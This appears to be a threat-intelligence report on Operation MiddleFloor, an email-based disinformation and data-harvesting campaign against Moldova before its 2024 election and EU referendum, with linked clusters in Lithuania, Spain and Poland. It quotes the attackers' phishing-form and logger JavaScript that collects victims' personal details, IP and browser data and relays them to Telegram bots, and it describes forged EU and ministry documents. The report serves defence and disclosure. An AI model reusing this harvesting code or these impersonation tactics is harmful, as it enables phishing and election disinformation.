Beginning in early August, Check Point Research observed a cyber-enabled disinformation campaign primarily targeting Moldova’s government and education sectors. Acting ahead of Moldova’s elections on October 20th, attackers behind this campaign likely seek to foster negative perceptions of European values and the EU membership process in addition to Moldova’s current pro-European leadership, with the intent of influencing the outcome of the upcoming fall elections and national referendum.
Following the start of the Russian-Ukrainian war, Moldova, a former Soviet republic, was granted EU candidate status in 2022. A nationwide referendum will be held on October 20, 2024, simultaneously with the presidential election, to determine whether the constitution should be amended to reflect the citizens’ desire for EU membership. Incumbent president Maia Sandu is actively campaigning for EU membership.
In this blog, we analyze the techniques used by the threat actors, whom we track as Lying Pigeon, in their disinformation campaign in Moldova and provide an overview of their different activity clusters in other parts of Europe in the last few years.
According to CERT Polska, the actor they track as APT-UNK2 with substantial overlaps with Lying Pigeon, was also responsible for distributing infostealers in Poland and staging fake websites.
Operation MiddleFloor is an anti-European and anti-government disinformation campaign targeting Moldova that primarily relies on emails to distribute its messages and gathers additional data from its targets. This approach is noteworthy because it diverges from the more common strategies seen in disinformation campaigns, such as the infamous Operation Doppelganger, which created fake versions of news websites and published misleading articles spreading pro-Russian narratives while leveraging social media to reach larger audiences quickly.
By using email-based communications, the operation can directly target individuals. Given the private nature of email, monitoring and counteracting the disinformation effectively becomes more difficult. Emails that seem to originate from trustworthy sources appear more legitimate to recipients, enhancing the credibility of the disinformation and making it easier for individuals to interact with it by clicking links, providing information, or entering personal details —and engage with the threat actors’ infrastructure.
Despite these advantages, the reach of email-based campaigns is limited, as emails rarely go viral compared to content shared on social media platforms. Additionally, the infrastructure behind email communications is more traceable, allowing authorities to track down the sources of disinformation more efficiently and take appropriate action against them.
One of the first waves in this campaign, which occurred in early August 2024, involved the distribution of a fake PDF document aimed at Moldavian civil servants and individuals in state positions.
The document, allegedly sent by the European Commission, outlines the measures and rules that Moldavian officials must comply with once the nation becomes a member of the European Union, including:
While this document is falsified and does not reflect any actual requirements for EU members or candidate countries, the last page provides a fake email address of a genuine EU Commission expert and a feedback form (both hosted on the same malicious domain europa[.]study
):
Another fraudulent document, designed to appear as if it was from the European Public Prosecutor’s Office (EPPO), targets Moldovan officials, specifically those in the judicial system:
The document requests personal details and information about the commercial activities of close family members under the guise of adhering to the EU anti-corruption regulations. The data is supposed to be submitted via the form on the attacker-controlled domain impersonating EPPO, europa-eppo[.]eu
. The document is not located on the actual EPPO document repository, does not follow the EPPO document template, and contains grammatical mistakes (such as “august” written in lowercase), indicating an obvious fake.
All the fake forms have very similar code and a similar look.
The HTML of these forms loads an additional script, index.js: <script src="index.js"></script>
which collects the following data:
window.navigator.userAgent
.It then sends this data in a POST request to script.php
and redirects the victim to a “form is successfully submitted” page.
const obj = { name: "", [multiple form fields omitted] IPData: {}, }; const form = document.getElementById("blueForm"); const firstname = document.getElementById("blueFormName"); [multiple form fields omitted] form.onsubmit = async (e) => { e.preventDefault(); obj.name = firstname.value; obj.surname = surname.value; [multiple form fields omitted] obj.userAgent = window.navigator.userAgent; await getUserIPData(); if (isAllInputsField()) { console.log(obj); await postData(); } }; const postData = async () => { const data = new FormData(); for (param in obj) { if (param !== "IPData") { data.append(param, obj[param]); } } for (param in obj.IPData) { data.append(param, obj.IPData[param]);} await fetch("script.php", { method: "POST", body: data, }).then(() => { window.location.href = "http://europa-eppo[.]eu/forms/3946275"; form.reset(); }); }; const isAllInputsField = () => { [UI checks on form validity omitted] }; const getUserIPData = async () => { return await fetch("https://ipapi.co/json/") .then((d) => d.json()) .then((d) => (obj.IPData = d)); };
After the data is submitted to the server, it returns a JSON response that indicates the data was successfully sent to a Telegram bot with the name setsetinbot
and the title set
:
The data gathered about the victim’s environment is not highly detailed. Still, combined with the personal information provided in the form, it could facilitate more targeted attacks, potentially including drive-by attacks. Threat actors may exploit the victim’s vulnerability to spear-phishing campaigns, especially as they have already interacted with the threat actors’ infrastructure.
Some other pages of these sites, such as the main page, redirect the visitor to the actual legitimate site but log the visitor’s data:
<!DOCTYPE html> <html lang="en"> <script src="./logger.js"></script> <script> setTimeout(() => { window.location.href = 'https://www.eppo.europa.eu/en' }, 1500); </script> </html>
The script logger.js
is always the same: sha256: 4df435afa20401e3af2d17bf8dd67a9d8553520e29cc05905fc9458b8e81ce8f
) –
it collects the user-agent, IP address data, and the current URL visited and posts the collected data to logger.php
:
const getLogs = async () => { const ipData = await fetch("https://ipapi.co/json") .then((res) => res.json()) .then((data) => data); const userAgent = window.navigator.userAgent; const logs = { page: window.location.href, ...ipData, userAgent, }; sendLogs(logs); }; const sendLogs = async (logs) => { const data = new FormData(); for (param in logs) { data.append(param, logs[param]); } await fetch("logger.php", { method: "POST", body: data, }); }; getLogs();
The response to this request contains yet another JSON message indicating successful interaction, this time with another Telegram Bot:
[omitted] "is_bot":true,"first_name":"TESSET_BOT","username":"TESSETTES_BOT"},"chat":{"id":-4586992285,"title":"TES","type":"group","all_members_are_administrators":true} [omitted]
It is evident that the threat actors have distinct notifications (and distinct Telegram bots) for victims who submitted the form and for any curious users (or researchers) who visit other pages.
In early September, several organizations and institutions in the Republic of Moldova, including those from the education sector, received an email with an alleged “resolution” from the Ministry of Labor and Social Protection, with information about “changes in the migration policy.”
Translation of the email:
Dear citizens of the Republic of Moldova, The Ministry of Labor and Social Protection informs you about the new decree "on changes to the migration policy in the Republic of Moldova" of August 26, 2024. Due to the large flow of migration from the Republic of Moldova, it was decided to strengthen the measures to attract migrants from the Middle East to compensate for the losses on the labor market. We are attaching an appeal to this letter outlining the decisions taken to strengthen measures to support migrants. Sincerely, Principal Consultant in the Department for Employment and Labour Migration Regulation Policies Christina COMAN
The attached fake document contains content about “strengthening measures to attract migrants from the Middle East to compensate for the losses on the labor market due to the large migration flow from Moldova.” Among other claims, it states that the percentage of migrants in every organization must be at least 30%, that new mosques will be built in every region of the country, and that a simplified process for obtaining citizenship will be implemented for migrants employed by Moldovan companies. Moldovan officials confirmed that the document is fake.
Another troubling issue being exploited by the threat actors is the topic of gas prices for the upcoming winter. In mid-September, an email claiming to be from the Ministry of Energy stated that gas prices would increase and that planned interruptions to the natural gas supply would occur during the winter:
Translation:
Dear citizens of the Republic of Moldova, The Ministry of Energy of the Republic of Moldova informs you about the increase gas tariffs for subscribers of "Moldovagaz" companies, "Energocom", "Moldovatransgaz" and "Vestmoldtransgaz". Beginning as of November 1, 2024, the new rate will be 18.06 lei per cubic meter (including VAT). We also inform you of the interruption planned supply of natural gas during the evening from 1 October 2024 to January 1, 2025. We hope for your understanding your. We try to do our best for life comfortable of the citizens of the Republic of Moldova, therefore, socially vulnerable groups will have the opportunity to apply compensations. The order is attached to this letter. Also, the order will be duplicated on the official website of the Ministry of Energy of the Republic Moldova. Sincerely, Secretary General of the Ministry of Energy of the Republic of Moldova, Cristina PERETEATCU
The Ministry of Energy already reported this message as disinformation. Despite attempts to make their emails appear legitimate, the threat actors confused the name of the General Secretary of the Ministry of Energy, Andrei Grițco, with that of the State Secretary within the Ministry of Energy, Cristina Pereteatcu.
Among the emails sent by the threat actors, some lacked attachments. One of these emails impersonated a member of the European Commission Cabinets using the spoofed domain europa-ec[.]eu
and was sent to more than 80 recipients at one of the most prestigious universities in Europe:
The email claims to promote a pro-European message, using the current president, Maia Sandu, as a source of inspiration, but spreads disinformation about European education values and standards. For example, deliberately lowering student grades to encourage academic growth is not accepted in European education policy or discourse. The email also features false restrictions on job opportunities for low-performing students and misleading requirements for working abroad within the EU. All these claims contradict the EU’s education policies, prioritizing equity, inclusion, and fairness.
The second wave of disinformation emails targeting employees of education institutions was sent on September 24 from a fake email domain impersonating the Moldovian Ministry of Education and Research. The emails contained PDF titled Privind aprobarea Programului ambasadorilor UE.pdf
(“Regarding the approval of the EU Ambassador Program”). The PDF included a picture of the alleged official order from the Ministry, with content primarily focused on topics such as sex education and non-binary genders in context of educational institutions integration into the European Union.
The email mentioned above about European education values was written in English yet contains some structural errors that suggest it was translated from another language. These include phrases such as “has already addressed to you” and “instill tolerance to all genders”, which are likely literal translations of those phrases from Russian.
The email’s first numbered point, which addresses gender equality, refers to “toilets for the middle floor”, a phrase that does not make sense in English. This is a literal translation from the Russian phrase «туалеты для среднего пола», meaning gender-neutral toilets.
Another argument supporting the Russian-speaking origins of Lying Pigeon is the metadata of both PDF documents which are purportedly from European institutions.
Both list ru-RU
for Language metadata, meaning that the document was created using the Russian language local or regional setting. The document metadata lists UTC+3 for the time zone. A segment of the Moldavan population speaks Russian, and in August, the Moldavan time zone corresponds to UTC+3 due to Daylight Saving time; in addition, parts of Russia and Belarus, and some other countries in Eastern Europe, the Middle East, and Africa are located in the UTC+3 time zone.
Over the course of Operation MiddleFloor, the threat actors used a few domain name registrars to register the domains that spoof European and Moldovan entities:
europa-eppo[.]eu
.gov-md[.]com
.energie-gov[.]md
, for greater legitimacy.All the domains and IP addresses used in this campaign are interconnected, enabling us to attribute these seemingly different techniques and messages to the same operation.
All the servers used in this campaign can be classified into two categories:
mail.mailogon[.]online
for a few different domains.The threat actors use Mailcow, an open-source mail server suite, to host their own servers for anonymity and greater flexibility and to manage and scale their operations.
On August 6, one of the early domains related to Operation MiddleFloor, europa[.]study
, and its Sogo subdomain was temporarily resolved to 185.255.132[.]69
hosted on AS 204997 (First Server Limited).
In the period of November 2023 – March 2024, this IP also hosted another cluster of domains:otllook[.]com
, sapsap[.]site
(also autoconfig.sapsap[.]site
and autodiscover.sapsap[.]site
), te-storg[.]com
(also autoconfig.te-storg[.]com
and autodiscover.te-storg[.]com
), mailorun[.]su
(also mail.mailorun[.]su
, autodiscover.mailorun[.]su
and autoconfig.mailorun[.]su
).
We determined that this cluster likely belongs to the same threat actors responsible for the MiddleFloor operation due to the following reasons:
185.255.132[.]69
hosted an email server with a similar Mailcow and Let’s Encrypt certificate setup.mailorun[.]su
, mimics Mailgun; the MiddleFloor campaign also used the domain mailgon[.]online
.Most of these domains – otllook[.]com
, mailorun[.]su
, and te-storg[.]com
– are registered with the same email address: gotohends@inbox[.]eu
. In addition, over time, a few more domains were registered with this same email address:
vilnius-summit[.]lt litexpo-portal[.]lt viilnius[.]lt nask-pl[.]com sso-log[.]com
This set of domains creates multiple additional pivot points, such as the IP address 45.133.148[.]35
and shared mail server, mail.mailos[.]ru
.
Based on these domains and their pivots, we identified a few additional clusters of Lying Pigeon’s previous activity. We suspect that those domains that are resolved to specific IP address, have an SPF record an MX record pointing to the same IP, were likely meant to send spoofed emails.
The 32nd formal meeting of the heads of state and governments of the thirty-one members of the North Atlantic Treaty Organization, their partner countries, and the European Union, was held in Vilnius, Lithuania, on July 11-12, 2023. This cluster of domains was observed within a short time frame around the event.
Domain | Entity spoofed | IP resolution | ASN | Time frame |
---|---|---|---|---|
vilnius-summit[.]lt | NATO summit | 45.133.148[.]35 | AS 49505 (JSC Selectel) | 08.07.2023 – 12.07.2023 |
urm-lt[.]com | Lithuanian Ministry of Foreign Affairs | 45.133.148[.]35 | AS 49505 (JSC Selectel) | 11.07.2023 – 08.04 2024 |
viilnius[.]lt | Lithuanian capital | 185.251.88[.]12 | AS 35278 (Sprinthost.ru LLC) | 12.07.2023 – 13.07.2023 |
litexpo-portal[.]lt | LITEXPO, NATO summit venue | 185.251.88[.]12 | AS 35278 (Sprinthost.ru LLC) | 12.07.2023 – 13.07.2023 |
The Spanish general election to elect members of the Congress of Deputies and the Senate, which comprise the country’s legislative parliament was held on July 23, 2023. Pivoting on existing domains and IP addresses, this cluster of activity includes the following domains, all of whom existed around the election date:
Domain | Entity spoofed | IP resolution | ASN | Time frame |
---|---|---|---|---|
comunicacion-presidencia-gov[.]es | Communication office of the Presidency | 45.133.148[.]35 | AS 49505 (JSC Selectel) | 22.07.2023-23.07.2023 |
comunidad-madrid[.]es | Community of Madrid | 185.251.88[.]12 | AS 35278 (Sprinthost.ru LLC) | 22.07.2023-23.07.2023 |
interior-gov[.]es | Ministry of the Interior (Spain) | 185.251.88[.]12 | AS 35278 (Sprinthost.ru LLC) | 23.07.2023 |
The last two domains were observed as part of a disinformation campaign discovered by QuoIntelligence. This campaign was targeting Russian-speaking communities in Spain the day before the elections with Telegram messages that linked to a fake website mimicking the website of the Community of Madrid. The fake website contained a warning from the Ministry of Interior about a planned series of attacks by the ETA, a Basque separatist organization. The message encouraged recipients to skip voting in the elections to avoid risking their lives. QuoIntelligence researchers also noted that the campaign used fewer delivery methods (e.g., no email-based vectors or massive social media campaigns) to spread the message. We suspect that the first domain in this cluster, comunicacion-presidencia-gov[.]es, which contains MX records pointing to the mail server mail.mailos[.]ru
at the same time, might have been used for email-based attacks, but as of now do not have any firm evidence.
The Economic Forum took place from September 5-7, 2023, in Karpacz. It attracted over 5,400 participants, including politicians, business leaders, and cultural figures from across Europe and other continents. The Forum featured a wide range of discussions, debates, and special sessions on crucial topics like the economy, security, and the future of Europe.
Domain | Entity spoofed | IP resolution | ASN | Time frame |
---|---|---|---|---|
isw-org[.]pl | Fundacja Instytut Studiów Wschodnich (Foundation Institute of Eastern Studies) which organized Economic Forum | 45.133.148[.]35 | AS 49505 (JSC Selectel) | 02.09.2023- 9.07.2023 |
golebewski[.]pl | The Gołębiewski Hotel in Karpacz where the Forum took place at | 45.133.148[.]35 | AS 49505 (JSC Selectel) | 02.09.2023 – 08.09.2023 |
Domain | Entity spoofed | IP resolution | Time frame | Time frame |
---|---|---|---|---|
cert-pl[.]pl | CERT Polska | 45.133.148[.]35 | AS 49505 (JSC Selectel) | 23.08.2023 – 06.09.2023 |
ivention[.]pl | Evention.pl, hosted the KSC Forum in Poland in August 2023 | 45.133.148[.]35 | AS 49505 (JSC Selectel) | 04.08.2023 – 08.09.2023 |
nask-pl[.]com | NASK – National Research Institute under the supervision of the Polish Ministry of Digital Affairs | 194.58.112[.]174 (REG.RU default shared IP), MX pointing to legitimate mailgun.org servers | AS 197695 (Domain names registrar REG.RU ) | 28.09.2023 – 31.03.2024 |
The CERT Polska report:
CERT Polska reported that the threat actor they track as APT-UNK2 carried out a campaign involving the impersonation of NASK (a Polish research and development organization, data networks operator, and internet domain name registry operator for the .pl country-level top-level domain). The campaign used the domain nask-pl[.]com
to distribute emails, which contained an attachment that included a PDF (md5: cff5b518a247756febc43386ad1ecc88
) with instructions and a Dropbox link for installing malicious Network_CPP_Shield.msi
(md5: 609c677a134efac42bfefe6d58451caf
). Victims’ machines were infected with the Lumma Infostealer.
Other domains that didn’t fit the clusters described above:
Domain | Comment | IP resolution | ASN | Time frame |
---|---|---|---|---|
freepresunlimited[.]org | Spoofs Free Press Unlimited, an NGO focused on international press freedom | 45.133.148[.]35 | AS 49505 (JSC Selectel) | 04.08.2023 – 31.03.2024 |
nnmnnm[.]ru | Refers to Noname057(16), pro-Russian hacker group also known as 05716nnm or Nnm05716 | 45.133.148[.]35 | AS 49505 (JSC Selectel) | 24.01.2023 – 15.09.2024 |
noname05716[.]ru | Refers to Noname057(16), pro-Russian hacker group | 83.69.236[.]72 | AS 12616 (Citytelecom LLC) | 23.01.2023 – 21.01.2024 |
sso-log[.]com | Refers to login activity | 38.180.59[.]182 | AS 9009 (M247 Europe SRL) | 22.03.2024 – 10.02.2024 |
pass-check[.]online | Refers to login activity | 38.180.59[.]182 | AS 9009 (M247 Europe SRL) | 06.05.2024 – 01.09.2024 |
Some interesting patterns we observed:
sso-log[.]com
and pass-check[.]online
(pivoted on the same IP addresses during the same timeframe): Judging by their names, we assume these are for use in web-based credential phishing attacks.nnmnnm[.]ru
which also has the same email server mailos[.]ru
, and noname05716[.]ru
which was resolved to the same IP address as mailos[.]ru
in the same timeframe. Both refer to the infamous Noname057(16) pro-Russian hacktivist group, which is known for its DDoS attacks against NATO countries. As the group never mentioned their sites in their public communications, it’s unclear what relationship, if any, exists between Lying Pigeon and Noname057(16).The disinformation campaign led by Lying Pigeon represents a significant and ongoing threat to the political stability of the Republic of Moldova, particularly as the campaign seeks to influence the outcomes of both national elections and the EU membership referendum. Our investigation also connected Lying Pigeon to previous election interference activities in Spain in 2023, highlighting their persistent involvement in undermining European democratic processes. Additionally, this group has been active around major European events, such as the NATO summit and the European Economic Forum, likely using these high-profile occasions to further their disinformation efforts.
Beyond their influence operations, Lying Pigeon likely uses their campaigns to distribute infostealer malware and collect sensitive information for future targeted attacks. This dual approach of combining disinformation with information harvesting underscores the sophisticated and multifaceted nature of Lying Pigeon’s operations, making them a critical threat actor to monitor in the ongoing struggle to protect democratic integrity and ensure cybersecurity in Europe.
Middle Floor Cluster
europa[.]study
europa[.]social
europa-ec[.]eu
europa-eppo[.]eu
gov-md[.]com
moldova-social[.]md
social-moldova[.]md
moldova-energie[.]md
energie-gov[.]md
socialisti[.]md
socialistii[.]com
mec-gov[.]md
md-mec[.]com
moldova-mediu[.]md
eupm-moldova[.]md
mcgov[.]md
mc-md[.]com
mailgon[.]online
fb9105dc73a52d36a612157536322a7d3630c813f6acf1b997b370cfd768118c
9a06192d3d922b1e4c404d2c9bac43d3315040635c472257c7a28f51b078ccfe
0e295605cfb9d922ff94d38cad5743da9e3d7d8feddee7b42ca3e2314133a0f0
5c34498dfab981a4d9fb2b898d4e965ae7378e066bbf01ae29bc61adf1a66b2d
b5455bda6a6dc166f548e6c686e1881314ed079a91232d5b3e3f955b0229484a
Mail servers
62.106.66[.]90
194.61.121[.]74
176.124.33[.]59
185.255.132[.]69
45.143.167[.]163
51.38.145[.]50
194.61.121[.]131
Lithuanian Cluster
vilnius-summit[.]lt
urm-lt[.]com
viilnius[.]lt
litexpo-portal[.]lt
Spanish Cluster
comunicacion-presidencia-gov[.]es
comunidad-madrid[.]es
interior-gov[.]es
Polish clusters
cert-pl[.]pl
ivention[.]pl
nask-pl[.]com
isw-org[.]pl
golebewski[.]pl
c8c3bcdb856b9acffa853124ed13a0cc96641691233004cbe9bf8e018edb8f1b
d1b285fbe249349ae167052d81b4ab5d7e78c14e1ae617ef0985cc101a119d82
Uncategorized domains
freepresunlimited[.]org
nnmnnm[.]ru
noname05716[.]ru
sso-log[.]com
pass-check[.]online
mailos[.]ru
mailorun[.]su
otllook[.]com
sapsap[.]site
te-storg[.]com